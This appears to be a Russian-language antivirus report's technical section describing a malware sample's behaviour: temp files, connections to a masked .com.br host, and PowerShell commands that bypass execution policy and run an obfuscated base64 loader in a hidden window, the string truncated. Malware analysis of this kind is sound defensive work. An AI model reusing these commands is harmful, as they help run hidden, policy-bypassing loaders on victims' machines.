Техническая информация
- %TEMP%\pjwsw.txt
- %TEMP%\qfkms.txt
- 'rw###.com.br':443
- 'rw###.com.br':443
- DNS ASK google.com
- DNS ASK rw###.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File %TEMP%\jpdck.ps1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -c "$Stringbase = 'U3RhcnQtU2xlZX' + [char]65 + 'gLVNlY29uZHMgNTsgW1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgPSBbU3lzdGVtLk5ldC5TZWN1cml0eVByb3R... (со скрытым окном)